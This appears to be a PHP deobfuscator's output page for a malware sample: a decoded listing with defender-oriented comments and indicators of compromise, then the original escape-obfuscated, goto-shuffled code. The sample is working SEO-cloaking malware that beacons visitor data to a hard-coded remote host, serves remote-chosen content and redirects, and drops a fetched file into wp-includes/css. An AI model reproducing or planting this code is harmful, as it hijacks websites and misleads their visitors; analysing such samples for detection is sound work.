PHP Decode
<?php goto oHLCF; Zk1HJ: if (isset($_SERVER["\110\124\124\x50\137\122\x45\x46\105\122\10..
Decoded Output download
<?php
// ANALYSIS NOTES (defender view). Only comments and line breaks were added; the
// statements are unchanged and stay in the sample's original textual order.
//
// What the visible code does: on every request it POSTs the visitor's Host,
// request URI, Referer, Accept-Language, scheme and a "search-engine crawler?"
// flag to a hard-coded remote host ($i5), then acts on marker strings in the
// reply: echo remote HTML or XML, send a 301 to a remote-chosen Location, emit
// a bare 404/500, or fetch a remote-supplied URL list. If the reply carries no
// recognised marker, or contains "nobotuseragent", execution falls through to
// the end of this block. That fall-through suggests the code was placed ahead
// of a legitimate page (e.g. index.php) -- inferred, not shown on this page.
//
// Control flow is scrambled with goto labels; the "[exec N]" tags below give
// the real execution order. The helper functions are called before their
// labels are reached, which works because PHP binds top-level function
// declarations at compile time.
//
// Artifacts useful for detection and clean-up, all derived from lines below:
//   * outbound cleartext HTTP POST to $i5 at /indexnew.php (optionally with
//     "?css=1"), User-Agent "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)",
//     form fields web, zz, uri, urlshang, http, lang;
//   * outbound GET to $i5 at /temp/style.css;
//   * a dropped file <docroot>/wp-includes/css/XXXuwo.css (or <docroot>/css/...),
//     where XXX is ROT13 of the first three characters of the site host without
//     "www." and "uwo" is ROT13 of "hjb", the first three characters of $i5;
//   * plain-text function names is_https, disbot, doutdo, doutdo_post, fcss,
//     ping_sitemap and drequest_uri.

// Entry point: jump to the first real statement.
goto oHLCF;
// [exec 14] Capture the Referer header when present ($h8 = $h8 is a no-op).
Zk1HJ: if (isset($_SERVER["HTTP_REFERER"])) { $h8 = $_SERVER["HTTP_REFERER"]; $h8 = $h8; } goto uprfX;
// [exec 27] On the site root, or any URI containing "ewttm", make sure the
// local cache file exists (fcss downloads it if missing).
ikOMI: if ($q3 == "/" || strstr($q3, "ewttm")) { fcss($y11, $l14, $o15); } goto dlhVJ;
// [exec 12] No-op self-assignment.
fVY0d: $s7 = $s7; goto ibyIF;
// [exec 13] Default Referer value is the empty string.
ibyIF: $h8 = ''; goto Zk1HJ;
// [exec 20] Full path of the dropped file: <docroot>/<css dir>/<name>.css.
TeaZQ: $l14 = $y9 . "/" . $s10 . "/" . $x13; goto EPyov;
// [exec 16] Pick the drop directory: wp-includes/css when a wp-includes
// directory exists under the docroot, otherwise a top-level css directory.
mOdyn: if (is_dir($y9 . "/wp-includes")) { $s10 = "wp-includes/css"; } else { $s10 = "css"; } goto b26dj;
// [exec 9] Declaration only. Returns true when HTTPS, X-Forwarded-Proto or
// Front-End-Https indicate TLS. The two HTTP_* values are client-supplied
// request headers.
pHvq6: function is_https() { if (isset($_SERVER["HTTPS"]) && strtolower($_SERVER["HTTPS"]) !== "off") { return true; } elseif (isset($_SERVER["HTTP_X_FORWARDED_PROTO"]) && $_SERVER["HTTP_X_FORWARDED_PROTO"] === "https") { return true; } elseif (isset($_SERVER["HTTP_FRONT_END_HTTPS"]) && strtolower($_SERVER["HTTP_FRONT_END_HTTPS"]) !== "off") { return true; } return false; } goto xZeU6;
// [exec 1] $h0 is never read again in this listing. URL-decoding it and then
// applying ROT13 yields the same hostname that is assigned to $i5 below.
oHLCF: $h0 = "%75%77%6F%76%67%65%6E%65%6C%6D%74%2E%63%66%6E%79%62%72%6D%68%2E%6B%6C%6D"; goto neqA4;
// [exec 3] $b2 records the scheme of the *victim* request; it is only reported
// to the remote host, not used for the outbound connection.
gWHdh: if (is_https()) { $b2 = "https"; } else { $b2 = "http"; } goto jFvhc;
// [exec 10] Host header of the current request (read without isset()).
xZeU6: $d6 = $_SERVER["HTTP_HOST"]; goto SIVfn;
// [exec 29] Build the controller URL; "?css=1" tells the remote side that the
// dropped file is already on disk. $j1 is always "http", so this is cleartext.
WQofW: if (is_file($l14)) { $f29 = $j1 . "://" . $i5 . "/indexnew.php?css=1"; } else { $f29 = $j1 . "://" . $i5 . "/indexnew.php"; } goto ltkfu;
// [exec 18] Strip a leading "www." from the Host header.
FetnQ: if (substr($d6, 0, 4) == "www.") { $b12 = substr($d6, 4); } else { $b12 = $d6; } goto AyLgg;
// [exec 5] Normalise an empty request URI to "/".
yDkUt: if ($q3 == '') { $q3 = "/"; } goto EAK1K;
// [exec 31] Dispatcher on the controller reply ($d30). Unless the reply
// contains "nobotuseragent", the first matching marker wins:
//   okhtmlgetcontent  -> echo reply as HTML, with "[##linkcss##]" replaced by the
//                        dropped file's contents (or removed if the file is absent)
//   okxmlgetcontent   -> echo reply as text/xml
//   pingxmlgetcontent -> refresh the dropped file, then fetch every URL in the
//                        reply through ping_sitemap() and echo the result table
//   getcontent500page / getcontent404page -> bare status header, then die
//   getcontent301page -> 301 with a Location taken verbatim from the reply
// Everything echoed or redirected here is chosen by the remote host and is
// emitted without escaping or validation.
KE_Jo: if (!strstr($d30, "nobotuseragent")) { if (strstr($d30, "okhtmlgetcontent")) { @header("Content-type: text/html; charset=utf-8"); if (file_exists($l14)) { $g31 = file_get_contents($l14); $d30 = str_replace("[##linkcss##]", $g31, $d30); } else { $d30 = str_replace("[##linkcss##]", '', $d30); } $d30 = str_replace("okhtmlgetcontent", '', $d30); echo $d30; die; } else { if (strstr($d30, "okxmlgetcontent")) { $d30 = str_replace("okxmlgetcontent", '', $d30); @header("Content-type: text/xml"); echo $d30; die; } else { if (strstr($d30, "pingxmlgetcontent")) { $d30 = str_replace("pingxmlgetcontent", '', $d30); fcss($y11, $l14, $o15); @header("Content-type: text/html; charset=utf-8"); echo ping_sitemap($d30); die; } else { if (strstr($d30, "getcontent500page")) { @header("HTTP/1.1 500 Internal Server Error"); die; } else { if (strstr($d30, "getcontent404page")) { @header("HTTP/1.1 404 Not Found"); die; } else { if (strstr($d30, "getcontent301page")) { @header("HTTP/1.1 301 Moved Permanently"); $d30 = str_replace("getcontent301page", '', $d30); header("Location: " . $d30); die; } } } } } } } goto TeegB;
// [exec 15] Docroot, falling back to this file's own directory.
uprfX: if (isset($_SERVER["DOCUMENT_ROOT"])) { $y9 = $_SERVER["DOCUMENT_ROOT"]; } else { $y9 = dirname(__FILE__); } goto mOdyn;
// [exec 24] Declaration only. Fetches $e16 with file_get_contents(), errors
// suppressed; the "if (!$i23)" guard is always true because $i23 was just set
// to ''. Fetching a remote URL this way depends on PHP's allow_url_fopen.
VlI_F: function doutdo($e16) { $i23 = ''; if (!$i23) { $i23 = @file_get_contents($e16); } return $i23; } goto vyLBV;
// [exec 28] Beacon payload. "zz" is the crawler flag from disbot(); "urlshang"
// carries the Referer. Passed to cURL as an array, so it goes out as
// multipart/form-data.
dlhVJ: $u28 = array("web" => $d6, "zz" => disbot(), "uri" => $j4, "urlshang" => $h8, "http" => $b2, "lang" => $s7); goto WQofW;
// [exec 6] Copy of the request URI that is reported to the remote host.
EAK1K: $j4 = $q3; goto msoou;
// [exec 19] Dropped-file name: ROT13(first 3 chars of site host + first 3 chars
// of $i5) + ".css".
AyLgg: $x13 = str_rot13(substr($b12, 0, 3) . substr($i5, 0, 3)) . ".css"; goto TeaZQ;
// [exec 25] Declaration only. cURL POST with a fixed legacy-browser User-Agent.
// Peer and host certificate verification are both switched off; no timeout is
// set, and the return value of curl_exec() is not checked.
vyLBV: function doutdo_post($c24, $e25) { $h26 = curl_init(); curl_setopt($h26, CURLOPT_URL, $c24); curl_setopt($h26, CURLOPT_POST, 1); curl_setopt($h26, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"); curl_setopt($h26, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($h26, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($h26, CURLOPT_HEADER, 0); curl_setopt($h26, CURLOPT_RETURNTRANSFER, 1); curl_setopt($h26, CURLOPT_POSTFIELDS, $e25); $a27 = curl_exec($h26); curl_close($h26); return $a27; } goto EwF7x;
// [exec 21] Remote source of the dropped file (cleartext HTTP).
EPyov: $o15 = $j1 . "://" . $i5 . "/temp/style.css"; goto h9mJG;
// [exec 8] Hard-coded remote controller hostname.
TE7p0: $i5 = "hjbitraryzg.psaloezu.xyz"; goto pHvq6;
// [exec 26] Declaration only. Creates directory $y11 if needed and, when $l14
// does not exist yet, writes whatever doutdo($o15) returned into it. All
// failures are silenced with @; an existing file is never overwritten.
EwF7x: function fcss($y11, $l14, $o15) { if (is_dir($y11)) { if (!file_exists($l14)) { @file_put_contents($l14, doutdo($o15)); } } else { if (@mkdir($y11)) { if (!file_exists($l14)) { @file_put_contents($l14, doutdo($o15)); } } } } goto ikOMI;
// [exec 17] Absolute path of the drop directory.
b26dj: $y11 = $y9 . "/" . $s10; goto FetnQ;
// [exec 23] Declaration only. True when the User-Agent contains "googlebot",
// "bing", "yahoo" or "google" (case-insensitive; the last two tests repeat
// earlier ones). HTTP_USER_AGENT is read without isset().
E0A_c: function disbot() { $y22 = strtolower($_SERVER["HTTP_USER_AGENT"]); if (stristr($y22, "googlebot") || stristr($y22, "bing") || stristr($y22, "yahoo") || stristr($y22, "google") || stristr($y22, "Googlebot") || stristr($y22, "googlebot")) { return true; } else { return false; } } goto VlI_F;
// [exec 22] Declaration only. Splits $e16 on CR LF, requests each entry with
// doutdo() from this server, and reports "pingok" when the body contains
// "Sitemap Notification Received", else "error". The URL list comes from the
// controller reply, so the remote side decides what this host requests.
h9mJG: function ping_sitemap($e16) { $x17 = explode("\xd\xa", trim($e16)); $j18 = ''; foreach ($x17 as $g19) { $w20 = doutdo($g19); $t21 = strpos($w20, "Sitemap Notification Received") !== false ? "pingok" : "error"; $j18 .= $g19 . "-- " . $t21 . "<br>"; } return $j18; } goto E0A_c;
// [exec 4] Request URI of the current visit.
jFvhc: $q3 = drequest_uri(); goto yDkUt;
// [exec 30] Send the beacon; $d30 is the trimmed controller reply.
ltkfu: $d30 = trim(doutdo_post($f29, $u28)); goto KE_Jo;
// [exec 7] Declaration only. REQUEST_URI, else PHP_SELF plus argv[0] or
// QUERY_STRING.
msoou: function drequest_uri() { if (isset($_SERVER["REQUEST_URI"])) { $j4 = $_SERVER["REQUEST_URI"]; } else { if (isset($_SERVER["argv"])) { $j4 = $_SERVER["PHP_SELF"] . "?" . $_SERVER["argv"][0]; } else { $j4 = $_SERVER["PHP_SELF"] . "?" . $_SERVER["QUERY_STRING"]; } } return $j4; } goto TE7p0;
// [exec 2] Scheme for every outbound URL; never set to anything but "http".
neqA4: $j1 = "http"; goto gWHdh;
// [exec 11] Accept-Language of the visitor (notice suppressed when absent).
SIVfn: $s7 = @$_SERVER["HTTP_ACCEPT_LANGUAGE"]; goto fVY0d;
// [exec 32] End of the injected logic; PHP mode closes here.
TeegB: ?>
Original Code
<?php
// ANALYSIS NOTES (defender view). Only this comment was added; the sample
// below is unchanged.
//
// This is the sample as found. Two obfuscation layers are visible:
//   1. every string literal is a double-quoted mix of octal (\NNN) and hex
//      (\xNN) escapes, which PHP resolves when it compiles the file, so no
//      eval/base64/gzinflate call is involved;
//   2. statements are shuffled and stitched together with goto and
//      random-looking labels.
// The decoded output on this page is the same program with the escapes
// resolved; read that listing for behaviour.
//
// What stays in clear text here and can be searched for on disk: the function
// names is_https, disbot, doutdo, doutdo_post, fcss, ping_sitemap and
// drequest_uri; the CURLOPT_SSL_VERIFYHOST / CURLOPT_SSL_VERIFYPEER options
// set to 0; and the leading "goto oHLCF;". The remote hostname, the
// /indexnew.php and /temp/style.css paths and the User-Agent appear only in
// escaped form, so a plain-text search for them will not match this file.
goto oHLCF; Zk1HJ: if (isset($_SERVER["\110\124\124\x50\137\122\x45\x46\105\122\105\x52"])) { $h8 = $_SERVER["\110\124\x54\120\137\122\x45\106\105\x52\105\122"]; $h8 = $h8; } goto uprfX; ikOMI: if ($q3 == "\57" || strstr($q3, "\x65\x77\164\x74\x6d")) { fcss($y11, $l14, $o15); } goto dlhVJ; fVY0d: $s7 = $s7; goto ibyIF; ibyIF: $h8 = ''; goto Zk1HJ; TeaZQ: $l14 = $y9 . "\57" . $s10 . "\x2f" . $x13; goto EPyov; mOdyn: if (is_dir($y9 . "\x2f\x77\x70\55\x69\156\143\x6c\165\x64\145\163")) { $s10 = "\x77\x70\x2d\x69\x6e\143\154\165\144\x65\x73\57\143\163\163"; } else { $s10 = "\x63\163\x73"; } goto b26dj; pHvq6: function is_https() { if (isset($_SERVER["\110\x54\x54\120\123"]) && strtolower($_SERVER["\x48\x54\x54\120\123"]) !== "\157\x66\146") { return true; } elseif (isset($_SERVER["\110\124\x54\120\137\130\137\x46\117\x52\127\101\x52\104\x45\x44\x5f\x50\122\117\x54\117"]) && $_SERVER["\x48\x54\124\x50\x5f\130\x5f\106\117\x52\127\101\122\104\105\104\137\x50\122\x4f\124\117"] === "\x68\x74\x74\160\x73") { return true; } elseif (isset($_SERVER["\110\x54\124\x50\x5f\x46\x52\117\116\x54\x5f\x45\116\x44\x5f\110\x54\124\x50\x53"]) && strtolower($_SERVER["\110\x54\124\x50\137\x46\x52\117\x4e\124\137\105\x4e\x44\x5f\x48\x54\124\x50\123"]) !== "\x6f\x66\x66") { return true; } return false; } goto xZeU6; oHLCF: $h0 = "\x25\x37\65\x25\x37\x37\45\x36\x46\45\x37\66\45\66\67\45\x36\65\45\66\105\x25\66\x35\x25\66\x43\45\x36\104\45\x37\64\45\62\x45\x25\66\x33\x25\66\66\45\x36\x45\45\x37\71\x25\66\62\x25\67\62\x25\x36\104\45\66\x38\45\62\x45\x25\x36\x42\x25\x36\103\x25\x36\104"; goto neqA4; gWHdh: if (is_https()) { $b2 = "\x68\x74\x74\160\163"; } else { $b2 = "\x68\164\164\x70"; } goto jFvhc; xZeU6: $d6 = $_SERVER["\110\124\x54\120\x5f\x48\x4f\x53\124"]; goto SIVfn; WQofW: if (is_file($l14)) { $f29 = $j1 . "\72\57\57" . $i5 . "\x2f\151\156\x64\145\170\156\145\x77\56\160\150\x70\x3f\x63\x73\x73\x3d\x31"; } else { $f29 = $j1 . "\x3a\57\57" . $i5 . 
"\x2f\x69\x6e\144\x65\x78\156\145\x77\x2e\x70\150\160"; } goto ltkfu; FetnQ: if (substr($d6, 0, 4) == "\167\x77\167\56") { $b12 = substr($d6, 4); } else { $b12 = $d6; } goto AyLgg; yDkUt: if ($q3 == '') { $q3 = "\x2f"; } goto EAK1K; KE_Jo: if (!strstr($d30, "\156\157\x62\x6f\x74\165\x73\145\162\141\147\x65\x6e\164")) { if (strstr($d30, "\157\153\150\x74\x6d\x6c\x67\145\164\143\x6f\x6e\x74\x65\156\x74")) { @header("\x43\157\156\164\145\x6e\164\x2d\164\171\160\x65\72\40\x74\145\x78\x74\x2f\x68\164\x6d\154\x3b\x20\x63\x68\141\x72\x73\145\164\75\x75\164\x66\x2d\70"); if (file_exists($l14)) { $g31 = file_get_contents($l14); $d30 = str_replace("\x5b\43\43\154\151\x6e\x6b\143\x73\163\43\x23\x5d", $g31, $d30); } else { $d30 = str_replace("\133\43\43\x6c\151\x6e\x6b\x63\163\x73\x23\x23\x5d", '', $d30); } $d30 = str_replace("\157\153\150\x74\x6d\154\147\145\164\x63\x6f\x6e\x74\145\x6e\x74", '', $d30); echo $d30; die; } else { if (strstr($d30, "\x6f\153\x78\x6d\x6c\147\145\164\143\x6f\156\x74\145\156\164")) { $d30 = str_replace("\x6f\x6b\170\x6d\154\x67\145\x74\x63\157\156\x74\x65\x6e\x74", '', $d30); @header("\103\x6f\x6e\164\x65\x6e\x74\x2d\x74\171\160\145\72\x20\x74\145\x78\164\x2f\170\x6d\154"); echo $d30; die; } else { if (strstr($d30, "\160\151\156\147\x78\155\154\x67\x65\x74\x63\x6f\x6e\164\145\156\x74")) { $d30 = str_replace("\x70\151\156\147\170\x6d\x6c\x67\x65\164\143\x6f\x6e\164\145\156\164", '', $d30); fcss($y11, $l14, $o15); @header("\x43\x6f\156\164\x65\x6e\164\55\x74\x79\x70\x65\72\40\164\x65\170\164\x2f\x68\x74\155\154\73\40\143\x68\141\162\163\x65\164\75\x75\164\146\x2d\70"); echo ping_sitemap($d30); die; } else { if (strstr($d30, "\x67\x65\164\143\157\156\x74\145\156\x74\65\60\x30\x70\x61\x67\145")) { @header("\x48\x54\x54\x50\x2f\x31\x2e\x31\40\65\60\x30\x20\x49\x6e\164\145\x72\x6e\141\154\40\123\x65\x72\166\145\162\x20\105\162\162\157\162"); die; } else { if (strstr($d30, "\x67\x65\x74\143\157\156\164\x65\x6e\x74\x34\x30\64\160\141\147\x65")) { 
@header("\x48\x54\x54\x50\x2f\61\x2e\61\x20\64\60\x34\x20\116\x6f\x74\40\x46\157\x75\156\144"); die; } else { if (strstr($d30, "\147\x65\164\143\157\x6e\x74\145\x6e\x74\x33\x30\x31\160\x61\147\x65")) { @header("\110\124\124\120\x2f\61\x2e\61\x20\x33\x30\61\x20\115\x6f\166\x65\x64\x20\x50\x65\x72\155\x61\x6e\145\x6e\x74\154\x79"); $d30 = str_replace("\x67\145\x74\x63\x6f\x6e\x74\x65\x6e\164\x33\x30\x31\x70\x61\147\145", '', $d30); header("\x4c\x6f\x63\x61\164\x69\157\x6e\x3a\40" . $d30); die; } } } } } } } goto TeegB; uprfX: if (isset($_SERVER["\x44\x4f\103\x55\x4d\x45\116\x54\x5f\x52\x4f\x4f\124"])) { $y9 = $_SERVER["\x44\x4f\x43\125\x4d\105\116\x54\x5f\122\117\x4f\x54"]; } else { $y9 = dirname(__FILE__); } goto mOdyn; VlI_F: function doutdo($e16) { $i23 = ''; if (!$i23) { $i23 = @file_get_contents($e16); } return $i23; } goto vyLBV; dlhVJ: $u28 = array("\167\x65\x62" => $d6, "\x7a\172" => disbot(), "\x75\x72\x69" => $j4, "\x75\x72\x6c\163\150\141\x6e\x67" => $h8, "\x68\x74\x74\160" => $b2, "\x6c\x61\x6e\x67" => $s7); goto WQofW; EAK1K: $j4 = $q3; goto msoou; AyLgg: $x13 = str_rot13(substr($b12, 0, 3) . substr($i5, 0, 3)) . "\56\x63\163\x73"; goto TeaZQ; vyLBV: function doutdo_post($c24, $e25) { $h26 = curl_init(); curl_setopt($h26, CURLOPT_URL, $c24); curl_setopt($h26, CURLOPT_POST, 1); curl_setopt($h26, CURLOPT_USERAGENT, "\x4d\x6f\x7a\151\x6c\154\141\57\64\x2e\x30\40\50\143\x6f\x6d\160\x61\x74\x69\x62\154\145\x3b\40\115\123\111\105\x20\x35\x2e\x30\x31\73\40\127\x69\x6e\x64\x6f\167\163\40\116\x54\40\x35\56\x30\x29"); curl_setopt($h26, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($h26, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($h26, CURLOPT_HEADER, 0); curl_setopt($h26, CURLOPT_RETURNTRANSFER, 1); curl_setopt($h26, CURLOPT_POSTFIELDS, $e25); $a27 = curl_exec($h26); curl_close($h26); return $a27; } goto EwF7x; EPyov: $o15 = $j1 . "\x3a\57\57" . $i5 . 
"\x2f\x74\x65\x6d\160\x2f\163\164\x79\154\x65\56\x63\x73\163"; goto h9mJG; TE7p0: $i5 = "\x68\152\x62\x69\x74\x72\x61\162\x79\x7a\x67\x2e\x70\x73\141\x6c\157\145\x7a\165\x2e\x78\171\172"; goto pHvq6; EwF7x: function fcss($y11, $l14, $o15) { if (is_dir($y11)) { if (!file_exists($l14)) { @file_put_contents($l14, doutdo($o15)); } } else { if (@mkdir($y11)) { if (!file_exists($l14)) { @file_put_contents($l14, doutdo($o15)); } } } } goto ikOMI; b26dj: $y11 = $y9 . "\57" . $s10; goto FetnQ; E0A_c: function disbot() { $y22 = strtolower($_SERVER["\x48\124\x54\x50\x5f\x55\x53\x45\122\137\x41\107\x45\116\124"]); if (stristr($y22, "\147\157\157\x67\154\x65\142\x6f\164") || stristr($y22, "\x62\x69\x6e\147") || stristr($y22, "\x79\141\150\x6f\x6f") || stristr($y22, "\x67\x6f\157\147\x6c\x65") || stristr($y22, "\x47\157\x6f\x67\154\145\142\x6f\x74") || stristr($y22, "\x67\x6f\157\147\x6c\x65\x62\x6f\x74")) { return true; } else { return false; } } goto VlI_F; h9mJG: function ping_sitemap($e16) { $x17 = explode("\xd\xa", trim($e16)); $j18 = ''; foreach ($x17 as $g19) { $w20 = doutdo($g19); $t21 = strpos($w20, "\123\x69\164\x65\x6d\141\x70\40\116\x6f\164\151\x66\x69\x63\141\x74\151\157\x6e\40\122\x65\x63\x65\151\166\x65\144") !== false ? "\x70\x69\156\x67\x6f\153" : "\x65\162\x72\x6f\x72"; $j18 .= $g19 . "\55\x2d\40" . $t21 . "\x3c\x62\162\x3e"; } return $j18; } goto E0A_c; jFvhc: $q3 = drequest_uri(); goto yDkUt; ltkfu: $d30 = trim(doutdo_post($f29, $u28)); goto KE_Jo; msoou: function drequest_uri() { if (isset($_SERVER["\x52\x45\121\x55\105\123\x54\x5f\x55\x52\x49"])) { $j4 = $_SERVER["\x52\x45\x51\125\105\123\x54\x5f\125\x52\x49"]; } else { if (isset($_SERVER["\x61\x72\x67\166"])) { $j4 = $_SERVER["\x50\x48\x50\137\x53\105\114\106"] . "\77" . $_SERVER["\141\x72\x67\x76"][0]; } else { $j4 = $_SERVER["\x50\110\120\137\123\105\114\x46"] . "\77" . 
$_SERVER["\x51\x55\105\x52\131\x5f\123\x54\122\111\116\107"]; } } return $j4; } goto TE7p0; neqA4: $j1 = "\x68\x74\x74\160"; goto gWHdh; SIVfn: $s7 = @$_SERVER["\x48\x54\124\x50\x5f\x41\x43\x43\105\x50\124\x5f\x4c\101\116\107\x55\x41\107\105"]; goto fVY0d; TeegB: ?>
Function Calls
None |
Stats
MD5 | 0f4e604fb955595cb3e0a5496bf4ee89 |
Eval Count | 0 |
Decode Time | 55 ms |